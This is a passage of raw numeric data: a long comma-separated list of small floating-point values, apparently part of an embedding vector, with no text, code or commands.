5887244,-0.009655954,-0.011885745,0.035182886,-0.015323699,-0.012794938,-0.00012696398,-0.0010845828,-0.0041757203,0.019998673,0.0010038557,0.018236002,-0.00030138931,-0.0019132395,-0.0070930156,0.007007538,-0.00057037274,-0.00011826009,0.036806546,0.017483555,0.0009243941,0.020905659,0.0012104241,-0.013117085,-0.0293738,-0.00036433374,-0.012979951,-0.0010487247,0.007247422,-0.010138988,0.011012437,-0.016526164,0.009082706,0.0014254166,0.014937761,-0.028017852,-0.013488597,0.01121804,-0.0042349594,-0.010422403,0.031516176,-0.009850955,0.03393494,-0.008912708,-0.008618328,0.012621348,-0.0063519124,-0.007912449,-0.012590636,-0.024888717,-0.022821648,0.028318612,-0.014318202,0.0044028466,0.0030330746,-0.00088619755,-0.020837415,-0.0065106773,-0.018362472,-0.005699482,0.0055878335,0.0053749126,0.012826578,0.00062346103,-0.010443871,-0.017960044,0.024886835,0.017333487,0.0018392033,-0.0066170194,0.007505052,0.016004942,0.011329526,-0.034174457,-0.01773341,-0.0022680508,-0.04388149,-0.007724185,0.021125505,0.010513811,0.0029597785,-0.004580653,0.02295922,-0.0019466674,0.0016529146,-0.023734607,0.0041631553,0.009868045,-0.020728637,-0.039048314,0.010354505,0.012576911,-0.022346454,0.00009917862,-0.022655036,-0.016321521,-0.0010682953,0.011482895,0.0007463714,-0.0026438874,0.012461801,0.016154476,-0.020583285,-0.008922261,0.008923771,-0.0068440638,0.017657991,-0.001532742,0.026882699,0.001778689,-0.007992802,-0.025723994,0.0014766756,-0.027271599,-0.0063466914,-0.0017791186,0.0010472815,0.0075485413,0.012327407,-0.015319783,-0.019437023,-0.0134401135,0.011423502,0.001865059,-0.0058461865,-0.00048108448,-0.017766269,0.0030356217,-0.01133532,0.009094069,0.007878971,0.02289179,0.020977953,0.0068971617,0.021523606,0.009685318,-0.016848613,-0.0051604905,0.006320457,-0.012455999,-0.019173253,-0.0047467058,0.02656465,0.012981896,-0.025799237,-0.019677738,-0.009672595,-0.021156637,0.01738404,0.0114357015,-0.020454133,0.00766933,-0.05062247,0.0076801376,0.0014161026,-0.02409993,0.008687371,0.007897111,0.008672896,0.0058728117,-0.00048616834,0.013615631,0.031609796,-0.019968886,-0.00047335355,-0.005537008,-0.004594734,0.02256745,0.015460087,-0.0141199995,0.003937537,-0.009881132,0.009712493,0.035151657,-0.016184632,-0.028846797,-0.006199558,0.03155419,-0.010333221,-0.02169302,-0.0038160037,-0.01771958,-0.017670434,-0.01723965,0.09147624,0.016201394,-0.0024752528,-0.018208355,0.005496753,-0.0018210046,-0.03901818,0.0055894735,-0.019625518,-0.00347061,-0.026081046,0.011066675,-0.012734789,0.014703314,-0.005846524,-0.0058228318,0.010820184,-0.0032532762,-0.06555713,0.022835478,0.007174267,0.01069438,0.00002328639,-0.014600842,0.006139065,0.008149769,-0.01493071,-0.0107315555,-0.019837728,0.003830254,-0.0001404464,0.011342391,-0.028962778,0.008046639,0.010994088,-0.031064035,-0.0019718374,-0.00005109326,-0.010451076,-0.010210383,-0.010872829,-0.00017426163,-0.0064052558,-0.0022387577,0.0033967523,0.024006376,0.04501449,-0.015447043,-0.007420646,0.016299354,0.013299987,-0.0039688405,0.017059214,0.029306332,-0.028042546,0.006975791,0.019016914,0.004286139,-0.014166969,-0.009242528,0.008553418,-0.0006785863,-0.01947411,0.028017662,0.01166782,-0.0031618648,0.040570017,0.039996628,0.0029987765,0.023303194,-0.03295834,-0.0068573905,-0.019263038,-0.008037016,0.0072934027,-0.00060460425,0.0028240366,0.007842025,-0.012746741,0.033254735,0.0055802353,0.00063593424,0.0040656156,-0.005804148,0.0072063752,0.000030602667,-0.016877592,-0.010342558,0.013031758,-0.014531317,0.012375599,0.020906214,-0.014014618,0.0027239225,0.0058792266,0.02111313,-0.005648073,-0.0005606819,-0.014626053,-0.034994457,0.006631058,0.008245424,-0.021782413,0.0040728184,-0.020555854,0.020708805,0.011012841,-0.014390949,-0.0077014253,-0.0034850005,0.026511988,-0.026880031,0.036284607,-0.032896142,-0.0014986121,-0.038373943,-0.0017175361,0.0025289552,-0.008278421,-0.010156303,-0.029472282,-0.0033313755,-0.0007649362,0.014800032,-0.017300976,-0.0067573497,-0.0377915,-0.020262359,0.008611033,-0.0113470275,-0.0071543157,0.0016681235,0.010485192,0.0059896386,0.006902051,0.012722105,0.017916122,-0.010126474,0.033995267,-0.003809692,0.010559171,0.0138485795,0.016951272,-0.02011333,-0.0012318352,-0.013964112,0.0017479917,0.0015528229,-0.0024858348,-0.0003913306,-0.010571932,0.019641355,0.02308598,0.028743379,0.0112183215,0.008127199,-0.010303267,-0.011962595,0.0047030854,-0.020700267,-0.024987066,0.020145835,-0.021083282,0.012087207,0.0027286077,-0.007693442,-0.016954558,0.073881336,-0.0024334274,-0.011284093,-0.0024150356,-0.046040382,-0.007965913,0.014740443,0.0043616267,-0.0052043367,-0.005889023,-0.010042116,-0.02525698,0.01207757,0.0041149925,-0.026518518,0.01779802,-0.027460678,-0.009462575,-0.02040518,0.0026473622,0.019909667,-0.013709726,-0.01655968,0.026352245,0.00052193756,0.015166177,0.010642542,-0.014295345,-0.00024442666,-0.025158072,-0.020582534,0.012964682,0.0036141407,0.008769369,-0.042071726,0.0138225155,0.00950908,0.008279122,0.00055530743,0.003453318,0.008730932,0.003907086,0.0015750383,-0.023707353,-0.010204542,0.03016034,0.021910239,-0.0066612903,-0.0057036495,0.01681604,0.0038542368,0.026018541,-0.016241644,0.020283753,-0.006853032,0.036139056,0.011700521,-0.05349109,0.043735012,0.020310728,0.018935623,0.024097744,0.010738432,-0.003970484,0.0015172965,0.037815996,-0.017117048,0.0018731316,-0.0073628197,0.016998218,0.004521088,0.013342317,-0.009691225,0.0035235335,-0.015635196,0.01632979,-0.005363095,0.008107007,0.009349722,0.013037614,0.010950861,-0.008269882,0.0067832763,-0.011970726,-0.00659383,0.0012381502,-0.0012666292,0.01964836,0.019027913,-0.010272743,-0.00065511145,0.014677504,0.016359987,0.0108357025,0.026078613,0.018421197,0.00686329,0.021794101,-0.0069177253,0.0071776835,0.01960569,-0.0060478053,0.0037703542,-0.012673533,-0.003189438,0.0013888913,0.016465634,-0.01406218,-0.0013047829,0.029837945,-0.008856552,0.0024757136,0.00083492906,0.0006547557,0.0006217101,-0.017268836,-0.007040294,-0.02460911,-0.0030362108,0.0030679125,0.00875961,0.010554808,0.0095020635,0.018381108,-0.012675929,0.0042182477,-0.002750641,-0.017293971,0.010438501,0.023452858,0.006945479,0.03025274,0.01763276,-0.02847278,0.0072284047,0.0048862514,-0.014728313,-0.034582466,0.03307109,-0.006794716,0.01521699,0.018855227,0.03636473,-0.015702313,0.009873231,0.026357833,0.028269136,0.0069125784,-0.022410741,0.0105985645,-0.014639953,-0.0031530713,-0.00008242952,-0.011351968,0.0038762866,0.0037380445,0.024630873,-0.021657415,0.0011848259,0.009989199,0.024556909,-0.008214547,0.0062206397,0.005876955,-0.0332022,0.017907972,-0.010630914,0.035109244,-0.030550944,-0.034748442,-0.003276131,0.0041704345,0.013949614,0.008780133,-0.001104772,-0.029831294,0.0035751401,0.010169949,0.018836463,0.0064010164,0.020793587,-0.025543835,-0.003612436,0.008967396,0.0035247991,-0.001152483,-0.009060003,0.0092331655,-0.009796135,-0.009977807,-0.014582364,-0.009630289,-0.0033122322,0.038812146,0.009463905,-0.01869544,-0.017534342,-0.013941278,-0.011336631,0.027675519,-0.0050934055,0.000008937615,-0.004525158,0.018698052,-0.01317602,-0.020816134,0.038248997,0.0036166643,-0.010640879,0.008445631,0.038281392,0.020114698,-0.007450884,0.0060225744,0.013851038,0.012121215,-0.029101996,-0.02550133,0.003237892,0.0065606427,0.01861931,-0.012875923,0.003455602,0.021720145,0.00019481857,0.009786079,0.015305095,-0.017459713,0.0041086096,-0.0019976406,-0.017699959,-0.020598292,-0.012941892,-0.011915945,-0.015997747,-0.005496661,-0.017117139,0.010016536,0.008103451,0.002380449,-0.038863458,0.017134098,0.007948769,-0.0069851535,0.009342848,0.014072378,-0.020693257,0.0055616223,0.028038224,-0.0062001706,-0.010037233,0.008261835,0.018122073,-0.0038764318,-0.036748923,0.006857696,-0.014581823,0.00019248163,-0.022667835,0.015567532,0.008300111,0.008848489,0.008948337,-0.016911754,-0.027798595,-0.0060778693,0.0052357377,-0.03652647,0.0058548776,-0.00057509367,0.04182276,-0.023043873,0.009500245,0.015206634,0.005035557,-0.015603691,-0.025215924,0.025984386,-0.045194123,-0.0009985688,0.013648674,0.017593658,-0.010772318,0.047128078,0.021748744,0.009621957,-0.010521015,-0.0065434007,-0.008711303,-0.017729528,0.0011424933,0.0096712615,0.0027451124,-0.012132886,-0.041320063,-0.040012527,-0.03465115,-0.032173228,-0.026016718,0.04905186,0.0019301353,0.008508495,-0.004313108,0.003324207,-0.011390648,-0.015248611,0.009102467,-0.042769086,-0.0016667304,0.019142365,-0.0031890825,0.024752209,-0.015329216,-0.012144441,-0.008445298,-0.015607172,-0.027059805,0.0038407836,-0.007652227,-0.028331243,-0.007364259,0.013170865,-0.021308605,0.023186216,-0.020725043,-0.0039046947,0.006772724,0.04833951,0.036687393,0.00084246625,-0.0024817022,0.023412371,0.0055500385,0.011717486,0.008999257,0.025470793,0.015137111,0.0047904314,-0.0034879579,0.0036824457,-0.00019070061,-0.0182135,-0.0016392985,0.019302376,0.03240071,-0.0076303785,0.025189664,-0.0078108213,0.030606616,-0.013340271,0.0052092047,-0.01125722,0.027847297,0.020627234,0.0049272617,0.015561309,-0.020964798,-0.013935979,-0.028233891,-0.026447443,-0.0041166735,0.032751434,0.009867766,0.012215863,-0.0029890933,0.012165069,0.011226966,0.017774247,0.0029797524,-0.0138975475,0.00028019774,-0.014560672,-0.0061293934,-0.019193944,-0.007992234,-0.043157507,-0.010164567,0.01746856,0.010098048,0.024693402,-0.002037864,-0.0134317065,-0.0022697009,-0.009688036,-0.049701262,-0.0126902675,-0.0040145097,0.019353295,-0.025390932,0.022488886,0.012041947,0.0052576615,0.0075775892,0.014716258,-0.035953864,-0.006831155,0.003702939,-0.011966804,0.0045512826,-0.0015248046,0.0073006535,0.013068302,0.0012018598,0.0032289561,-0.015819712,-0.0051918216,0.0078025656,0.001561636,0.011141974,0.01260316,-0.0008012058,0.0028019901,-0.030938083,-0.0117448885,0.0016777498,-0.026721,-0.022198727,-0.0049117594,-0.0029101844,-0.014894732,0.0045768786,-0.011868597,0.025964245,0.023112858,-0.0025580004,-0.0035089077,-0.014693217,0.0025093046,0.034561343,0.029584074,-0.013399305,-0.021912398,0.004988178,0.009830055,-0.01921281,0.0030506945,0.0035271032,-0.01954256,-0.014110785,-0.041803148,0.0015402226,-0.026990883,0.005823225,-0.0033117838,-0.02259407,0.043647338,-0.018006237,0.022228928,0.0067751277,0.008852078,0.0016535291,-0.013953548,0.015193999,-0.030410325,-0.019752305,0.022253942,-0.0117014535,0.012342418,0.009166429,-0.03677745,-0.0149501255,-0.022308726,-0.013145033,-0.030429645,0.013192379,0.03106403,-0.023741335,-0.028394815,0.014388739,-0.008349248,0.018132487,-0.021534955,-0.006744194,0.01827881,-0.0026370268,0.013286173,0.026536474,-0.03606998,0.007901864,0.011503949,0.0073874462,0.03058118,-0.012294178,0.017770909,-0.016795954,0.010355164,0.0034371233,-0.024808165,0.031606894,0.013626258,0.011198622,0.032758195,-0.008962875,0.008005977,-0.0010845274,-0.024533216,-0.008684268,-0.014453647,0.027240107,-0.02353156,-0.0007503175,0.012445929,0.021176383,-0.002360448,-0.0046364227,0.023506,-0.018250812,0.0056014583,0.02161825,0.008343532,-0.0186701,-0.021298999,0.011818349,-0.0020450584,0.004672857,0.018395774,-0.027473424,0.005051606,0.023338918,-0.014728393,-0.0021264907,0.017660273,-0.005361554,-0.011289472,0.033774015,0.029870132,-0.0037718967,0.00093283376,0.019959636,-0.04374836,0.00071029674,-0.008430298,-0.016416883,0.019344715,-0.02480824,0.005049819,0.009554673,0.0006440518,0.024597406,0.008223145,-0.007322351,-0.014790377,0.0037847771,-0.01649134,0.0033520658,0.019105896,-0.0050790175,-0.013975699,0.006551054,-0.024151081,-0.02343146,0.016568165,-0.020021524,-0.004793895,0.019098733,0.013398766,-0.003806894,0.005730058,-0.019689908,0.027079675,0.03011453,0.0038369175,0.025094176,-0.024006233,-0.02160445,-0.0014374861,0.004533423,-0.016031899,-0.009708099,0.014259991,0.017936762,0.00013179539,-0.007797578,-0.004987079,-0.034379393,0.007763355,-0.03088321,-0.0127166025,0.013479091,0.02986033,0.0008945632,0.006441267,0.054175545,0.0029996731,0.001529487,0.003061524,0.01619779,0.0070556477,0.010806312,-0.018391777,-0.010757235,0.01703692,0.025341146,-0.004977597,-0.01219792,0.006210288,0.017388916,0.00834412,0.021701396,0.00012825997,-0.023487581,-0.010795183,-0.028393041,0.0079619875,-0.003070231,0.032307714,-0.01049866,0.000052122017,-0.003903134,0.014850795,0.004470186,-0.007398869,-0.010355277,-0.004237336,-0.015148048,0.0018624993,0.015704028,0.026054213,-0.008814238,-0.032883655,0.010908235,-0.009129388,-0.008560282,-0.0036694538,0.036134005,0.003442935,-0.0024378672,0.016191592,-0.01679956,0.033496555,-0.0021088722,0.00832019,0.0026719875,0.0035161134,0.007355305,0.005691539,0.023166342,0.010925182,-0.023934007,-0.0090597235,-0.009007992,0.045921817,-0.00082365377,-0.014207727,-0.0021824087,-0.00972208,-0.025364058,0.0022360133,-0.026369102,-0.0010755557,-0.0056956275,-0.011382804,-0.0028825516,-0.024655022,-0.0034509096,0.021311503,-0.030836614,-0.00073221995,-0.023885235,-0.026433645,0.017075691,0.0088407155,-0.0041317185,-0.0013172084,0.0012008734,-0.008684735,0.0036843857,0.022876456,-0.014215072,0.01851447,0.008682488,0.01345681,0.0014276841,-0.0026849285,0.038570832,-0.009391399,-0.0009719759,0.03711948,-0.0043627075,0.0011497481,-0.005191293,-0.009894103,0.042302996,0.03585921,-0.009068785,0.010002501,0.007871325,0.007834829,0.0036959422,0.00029823626,0.007617074,0.029323462,0.026110802,0.023157798,-0.005783422,-0.022595318,0.025559112,-0.0055765645,0.0095236795,0.0064005316,0.019090017,-0.002440011,-0.019747568,-0.014233736,0.005811826,0.014959659,-0.004812906,0.0003750344,0.0061753644,0.0050968993,0.005661601,-0.03853538,-0.011740239,0.0088524325,-0.022504656,0.000508184,-0.030570213,0.0094006965,0.0020280369,-0.039219484,-0.0035517325,-0.007509608,0.00045106403,-0.0053497814,-0.0044012624,0.021873886,0.013078565,-0.0046724067,0.015167147,-0.011232428,-0.005783859,-0.026793659,0.0000029487098,0.011983058,0.009608642,-0.022723723,-0.0049893074,0.015124841,-0.02653382,0.024984373,-0.008914427,0.0012452424,-0.02392754,-0.011575826,0.003817481,0.024396084,-0.015971778,0.041402366,-0.007400952,-0.03176863,0.02691612,-0.005888375,0.0069175577,0.018447535,-0.0003594756,0.040586043,0.018440269,-0.012047066,-0.00022244857,-0.014658983,-0.0073448974,-0.010773935,-0.011780752,-0.025117198,-0.003771695,-0.010974324,0.003480811,0.0033598503,-0.023404257,0.033426266,-0.012653993,0.025427362,0.0045575383,-0.021942928,-0.004399839,0.018725552,0.010557916,0.007660585,-0.022887185,0.018411996,0.01930409,-0.05376159,-0.0014326974,0.0129868705,0.0009961233,0.0009801041,0.016200623,0.00494989,-0.023977624,-0.0013790369,-0.01077113,0.008913742,0.018094212,-0.007544931,0.0085794935,0.021947317,0.015237487,0.0044471975,-0.00322694,-0.016742004,0.02258471,0.017485246,-0.002710568,0.00077994325,0.02847856,0.0038621135,0.010603401,0.006611424,-0.03125592,-0.011970476,-0.010127837,-0.003139082,-0.024423895,-0.008017444,0.0025888188,0.0064232135,0.0013823496,-0.0071912934,-0.007715373,0.04614797,-0.01389659,0.002540245,0.00015194358,0.021981904,-0.0056178602,0.017755672,0.008015114,0.01488758,-0.005347082,0.008477704,-0.017396223,-0.016754787,0.0023531863,0.010706489,-0.003404356,-0.008824216,-0.008588593,-0.0011282987,-0.0062972754,0.014117541,-0.015605443,0.009716295,0.0071960976,-0.011321114,0.0012952052,-0.006604307,-0.0032115171,0.02611328,0.031689398,0.015194809,-0.0038457992,-0.0014563149,0.025525525,0.018532394,0.010818189,0.007099437,0.012849932,-0.008695668,0.019801648,0.03972633,0.002714119,-0.014039777,0.026649892,-0.0030967104,-0.026166199,-0.03226192,0.0142442705,0.003604638,0.015094343,0.009300374,-0.0019303346,0.020455675,0.009610161,-0.010433562,0.067945726,-0.009697401,0.022160787,-0.00033680833,0.009699228,-0.03092743,0.013003891,0.0052056387,0.004187202,-0.0040417844,-0.03242586,-0.022970505,-0.010630874,-0.016142352,0.00013744205,-0.022100449,0.008249109,0.019972445,0.010455289,-0.0061145173,-0.0011968167,0.015227805,-0.005387337,0.020292737,0.014623635,0.016209938,0.005103421,-0.027131073,0.025407301,0.02059117,0.012293845,-0.003510535,-0.0012862203,0.014388757,-0.022673633,0.00022289652,0.004943849,-0.015876949,-0.015381762,0.01282642,0.0002453773,-0.0049169166,0.045808677,-0.0013059642,0.024780642,-0.01599503,-0.02566702,-0.013536964,0.0010282961,-0.008852926,0.0053377515,0.001451309,-0.014824718,-0.0022371237,-0.0038540615,0.006775964,0.0022607546,0.021616139,0.007553442,-0.015498718,-0.004893325,0.0062750783,0.0038446928,-0.005465197,-0.005219097,0.0076507432,-0.011382764,-0.006937351,0.027115632,-0.03151979,0.014313124,-0.02098282,0.00744974,0.013695009,-0.014366322,-0.0034635756,0.0036088473,-0.0029872756,-0.034135796,-0.013418175,-0.006018663,0.014020232,0.028722467,0.032505635,-0.0067424523,0.007161523,-0.0014356773,-0.00024572908,0.05204572,0.0084087895,0.017951079,0.017318899,-0.0070452653,0.0047382126,0.019086976,0.015187513,0.0067789643,0.018811008,-0.009227808,0.034480028,0.0006847045,0.0029549198,0.018588543,-0.012095992,0.0036724631,-0.012960974,0.004622744,-0.022627281,0.006372282,0.028428577,0.017642604,-0.0058595287,0.007046784,-0.0035552892,0.020893984,-0.009566559,0.010098687,-0.0007226377,-0.0054172915,0.008537508,0.0120330425,-0.012428715,-0.0032565168,-0.05814992,-0.0013825541,0.09390847,-0.009936045,0.010789736,0.011914318,-0.006858352,0.007281104,-0.102169506,0.009547969,-0.0008364787,0.009516377,0.0024673257,-0.015593418,-0.008073167,0.028068133,0.012605117,-0.024431776,-0.024589991,-0.016790232,0.032896973,-0.01469385,-0.0033647432,0.008190057,-0.009676358,-0.0055235345,-0.024681423,-0.0021268579,0.0033924489,-0.00607702,0.0012461032,0.004038301,0.0026105342,-0.0072972183,0.028146349,0.005354862,-0.030138282,0.016196316,0.018110497,0.0047630765,-0.01272259,-0.006458539,0.0426322,0.0152632985,-0.029449558,-0.028944844,-0.12212557,0.0046016937,0.018218862,-0.036412183,0.027652081,-0.019174116,-0.00061185256,-0.005654868,0.029962853,-0.015621481,0.0025904514,0.019777684,-0.012371191,-0.003653293,-0.01932288,0.0001975821,0.01507443,0.0066535613,0.005913171,-0.0046919617,0.02255781,0.0067369677,-0.011395833,-0.01197733,-0.039194874,0.013074068,-0.004314276,0.025094515,0.02189205,-0.006007322,-0.0039346637,0.003065573,-0.025979666,0.0011642401,-0.014154992,-0.009048662,0.0039459253,0.0047688787,-0.012491665,0.02050548,-0.0048332093,-0.0028413094,-0.01233997,-0.0026249434,-0.0030951484,0.022344047,0.003458523,-0.0033057726,0.01276542,-0.0012943803,0.03435891,0.0024823332,-0.027686927,0.01800786,-0.015970154,-0.01763179,-0.015025582,-0.013282803,-0.015091844,-0.00859689,-0.0061855577,-0.024474816,-0.00314701,-0.007370192,0.025166318,0.0067442176,0.010165802,-0.03451485,-0.010191257,-0.012303814,-0.0029168045,0.008770764,0.011504773,-0.014090997,-0.0020967014,0.01562231,0.0071823103,0.009040613,0.014784791,-0.020396315,0.013916595,-0.012550039,0.011528162,-0.03945135,0.010449404,-0.030380085,0.0008395041,0.0070310943,-0.011952711,-0.011139149,0.020947352,-0.01764102,0.0061380225,-0.008288178,0.036342897,0.018337406,0.04596029,-0.011643981,-0.021669088,0.011986749,0.011660784,-0.0001944933,-0.026714303,-0.01761085,-0.028258096,0.005500563,-0.0023923325,-0.008277292,-0.021177769,0.021877827,0.0034965596,-0.011527891,0.029799143,0.0059207454,-0.027633827,-0.018101204,-0.0031947463,0.00102391,0.007725674,-0.038363975,-0.026556486,0.024051946,-0.015203809,-0.00049441727,0.032287266,0.016757183,-0.018659964,-0.003616803,-0.028956642,0.013116325,-0.02982713,0.007358827,0.0037137603,0.010611682,-0.016582422,0.003759012,-0.004682327,0.004246957,-0.028116202,-0.011475117,-0.0015704463,0.008698574,-0.012122459,0.015427675,0.01553727,-0.009368782,0.03492899,-0.013144991,0.014479373,0.0028465036,-0.016065178,0.014748536,-0.023410503,-0.008611616,0.014901357,0.03876676,-0.002611462,-0.014945638,0.0155132925,0.026599724,-0.0033758155,0.007547569,-0.016695986,-0.0012375109,-0.022597771,-0.024486853,-0.020390714,-0.009071514,0.01775062,-0.022051359,0.009055764,0.004041581,0.01741395,0.0065184245,0.005372188,0.0050000846,-0.010825145,-0.012822402,0.021087551,0.018097728,-0.0055619883,0.020778708,0.0011114447,-0.011989582,0.005117815,-0.005112971,-0.025716722,0.010102939,0.0003714088,-0.0062113516,-0.035206743,-0.02677594,-0.0044056005,0.021336652,-0.028759087,0.0075800535,0.0014225387,0.013799071,-0.02686076,-0.010233228,-0.035521302,-0.022407096,0.017208982,-0.0020314332,-0.007489132,-0.0046427394,0.017181672,-0.012525588,-0.0015995867,-0.00007853106,-0.002552729,-0.0077993004,-0.0058770445,0.0064598667,-0.01605177,0.0043496736,-0.014689727,-0.0047853277,-0.0083693545,-0.013335021,0.006221837,-0.0007190927,-0.0007143403,-0.007181666,0.009995487,-0.0044861864,-0.0034523495,-0.034340728,-0.0013618256,0.0076206424,-0.0071974937,-0.014339885,-0.009032655,-0.02666271,0.019827034,0.017456971,0.015702385,0.010078454,0.00926201,0.0033865962,-0.02232303,-0.000078884295,0.029010303,-0.017708972,-0.017280597,0.017224766,0.024277776,0.023142358,0.006633895,0.016304703,0.009458065,-0.005139867,0.0066574076,0.027960047,-0.00024438594,0.01997708,0.008893186,-0.0014372437,0.0018050637,0.000900066,-0.01720641,0.0054694125,0.029167954,0.02398491,-0.014098934,0.005091844,-0.007594877,0.0036379944,-0.028822927,-0.021272207,0.05207724,-0.015907846,0.018592298,0.025885921,-0.0004628306,-0.035614472,-0.009791054,0.021731228,-0.009881726,0.042990994,-0.014588454,0.016790666,0.0064542512,-0.038272936,0.025844198,-0.007586193,0.032871034,0.027150385,-0.0117317755,-0.0049764016,-0.00354993,0.027723325,0.01177949,0.017982652,0.012484293,-0.018101262,-0.024213376,0.0030675745,0.0078675775,-0.016912268,0.0021218946,-0.011094038,0.0005095016,-0.041373365,0.009644546,-0.0036832087,0.019435823,0.00020080934,-0.0026205345,0.006875191,0.016227862,-0.028338984,-0.020531278,-0.0162766,-0.007956167,-0.012750172,0.027180262,-0.009544091,-0.0017850688,-0.0238715,0.030329943,0.04105097,-0.005073047,0.035655413,0.0011623608,-0.011521254,-0.01719644,-0.017940799,-0.0078092315,0.0040769656,-0.027759193,-0.0043760925,0.0067741605,-0.006193696,-0.010745314,0.018095138,0.0164547,0.005033092,0.007877479,0.0081367325,0.017873924,0.018003928,0.03099436,-0.0139561845,0.0039193807,-0.005373562,0.00241083,-0.009508907,-0.013315211,-0.018830638,0.0011810302,0.029848073,-0.013505965,0.0067535215,0.007902448,0.01632886,0.007707711,-0.021411574,-0.018568996,0.008232898,-0.013020405,-0.022539644,-0.019372758,0.0098481,-0.009425459,-0.014164923,0.0057200775,-0.011408939,0.033916365,-0.011281079,-0.0014735154,0.004214654,0.026779253,0.0034589649,-0.0292725,-0.0012466401,-0.006094065,0.008277989,0.0072187353,0.010257283,-0.005557099,-0.013711005,0.050204147,-0.028376928,0.003783742,-0.0061868853,0.012497601,0.012529062,-0.02066613,-0.00026592,-0.019890564,-0.024496749,-0.0056529525,-0.022974152,0.0010094598,-0.00002464333,-0.048100527,-0.015054244,-0.008449271,-0.019182857,-0.013638485,0.0071634836,0.026389616,0.004450675,0.012418323,0.004624101,-0.03154184,-0.024791881,0.0018248636,0.019717172,-0.011252277,0.015729634,0.009974152,-0.0034843795,-0.037248444,-0.0009858768,-0.023804996,-0.011885282,-0.011302669,-0.026109833,0.0141455,0.014666988,0.026321702,0.009261134,0.0061619724,0.015528617,-0.004921233,-0.0065558855,-0.019858437,0.0022996243,-0.0065084104,-0.009533685,-0.0045345547,0.00923775,0.037075065,0.029225925,-0.008456597,0.027638787,0.0068817222,-0.0034801988,-0.0030177324,-0.002082908,0.028415324,-0.008680083,-0.05822151,-0.021222007,0.018695049,0.015282979,-0.010699041,-0.040552653,-0.016026912,-0.0140092475,-0.014848729,0.010492101,0.00530496,0.015954921,0.010668185,0.0018045311,0.021227816,-0.0035968414,-0.012774605,0.031248618,0.0067718956,0.013367218,-0.006958645,-0.012107478,0.024635466,-0.004207747,-0.007867315,0.017499084,-0.020521209,0.021286212,0.05440284,-0.00033251796,0.024229014,0.004839192,-0.004832228,-0.0006824157,-0.00037437686,-0.022300724,0.024227818,-0.031389505,-0.0343494,-0.016405657,-0.0037520626,0.017369455,0.006302318,0.01126555,-0.07189902,0.0070621786,-0.012718284,-0.014088942,-0.017350316,-0.02269702,0.013604808,0.020234214,0.007598047,-0.009933749,0.0019033947,0.032940973,-0.0047176736,-0.0027092022,-0.005103096,-0.0023222123,-0.015311906,-0.010000121,-0.010880795,-0.0036980538,0.03114806,-0.03568766,0.0170757,-0.00459911,-0.0012462412,-0.0007572573,0.021557529,0.025682611,-0.0050914483,0.00546584,-0.0070146737,0.011838064,0.0014838766,0.018423779,0.021932054,0.0008296665,0.0071280724,0.021840487,0.008489872,0.0040693725,-0.0034392972,0.0050102756,-0.0012424424,-0.017851355,0.0049786116,-0.0061450764,0.015435093,0.015331208,0.008883047,0.023553064,-0.0014834637,-0.0021416624,0.013332374,0.011181218,-0.0009570259,-0.007870569,0.0043008495,0.003875755,0.008442822,0.0030970585,-0.017079521,0.0021157416,0.008122602,-0.01215534,0.009434158,0.008683809,0.008361328,0.016909616,-0.021896094,0.004529922,0.00043136027,0.028400594,-0.008018056,0.002810742,-0.000120778655,0.007863711,0.0054271473,-0.0022859005,-0.005157776,0.016622577,-0.025227254,-0.015726926,0.014879175,0.031577423,-0.005106827,-0.028072106,0.0076905414,0.0015656452,-0.021986414,0.0051157507,0.0013694853,0.0015004085,-0.008308224,-0.025034128,0.0026226975,0.006397804,0.0023822996,0.014814843,-0.012053729,0.00726277,-0.0074934056,0.012220092,0.0038115464,-0.026455095,-0.08475623,-0.007425878,0.015869731,-0.02399582,0.002255654,-0.026732622,0.018327188,0.000068794674,0.0480057,0.020181632,-0.013792809,-0.0056580626,-0.000084142106,0.0030969845,-0.021144146,-0.0007881865,-0.031094769,0.014555842,0.00028797617,0.00097314885,0.0024623086,-0.022786489,-0.002246743,0.018041868,-0.008711713,0.014536028,0.02154029,0.029748335,0.01997404,-0.009012278,-0.0048189857,0.00018568478,0.014021074,-0.00580209,-0.017538043,-0.014168219,0.0009142294,0.0033242048,-0.006345613,0.011926552,0.0110428445,-0.012865079,0.014971772,0.011167061,-0.013552204,-0.0064081363,-0.027925435,0.024335504,-0.01203442,-0.022575075,-0.0026295965,-0.0033219052,0.009636169,-0.00945058,-0.0036920495,-0.012899852,-0.01285616,-0.011823916,0.02231105,-0.003129645,0.002470694,0.01174324,-0.0058399546,-0.0024062712,-0.003002761,0.015406246,-0.0099469675,0.0075543276,0.0015659021,0.008352209,0.0005954448,0.039513238,-0.000797771,-0.005059648,0.029467618,0.00027399862,0.017411532,0.014701532,0.022324616,0.00021603603,0.011386292,-0.026074281,0.010490661,0.017404398,-0.013738546,0.016978312,-0.0032279831,-0.00023118121,-0.00441522,-0.0056831487,-0.0026310615,0.023277659,-0.00762899,0.028275989,0.015067688,-0.009768146,0.046715632,-0.0028697755,-0.015105878,-0.028663557,0.0042120893,-0.0082459785,-0.003894353,0.018122576,-0.020792099,0.021425432,0.016568575,-0.016698867,-0.0050175446,0.00006299928,-0.0017365065,0.03609335,-0.019026756,0.0097360555,0.013161648,-0.005268968,-0.006408127,-0.0019104807,-0.008815079,-0.0010026287,-0.009549306,0.00044143907,0.011636571,-0.02362254,-0.002741514,-0.019247947,-0.014121251,0.02843961,0.0047572986,-0.021405166,-0.00097567146,0.023678193,-0.0017228525,-0.006453218,0.0010386241,0.011019537,0.005535623,0.017344575,0.01554261,0.011164845,0.011620985,-0.0018945399,0.014501955,0.0035321924,0.007993199,0.009830825,-0.010786522,-0.010410171,-0.022226015,0.014865174,0.0020379617,-0.0029485722,0.011478868,0.023427937,0.0059150835,0.012437657,-0.010644331,0.011760527,-0.017860958,0.022282777,-0.0009375883,0.022655677,0.026095783,-0.01129831,-0.008123687,-0.02258317,0.000698457,-0.017943136,0.009173464,0.0027916718,-0.0065169143,-0.01802657,0.03180001,-0.045866303,0.023237597,0.009862831,0.030134758,0.01754961,0.021429535,0.03152945,-0.031253062,0.004783571,-0.015182677,-0.013271214,0.009247893,0.016873334,0.006856983,-0.014496122,0.010706587,-0.023312515,0.05427482,0.02205674,-0.023621708,-0.01216867,-0.0066934684,0.004516376,0.0021092305,0.017554224,0.0049126907,0.0026680476,-0.023306318,0.0044595595,0.012669839,0.00018198135,-0.006001425,0.006055446,0.0018497588,0.03199601,0.008359154,-0.012074377,-0.010160662,0.00785054,-0.016198998,-0.012993626,0.0051383455,0.024142986,0.007000877,-0.008244632,-0.0050684977,0.009203662,-0.011911912,-0.027712304,0.0006521699,-0.0102015715,-0.009130783,0.039948273,0.013918353,0.012681848,-0.031813394,-0.01355168,-0.009781248,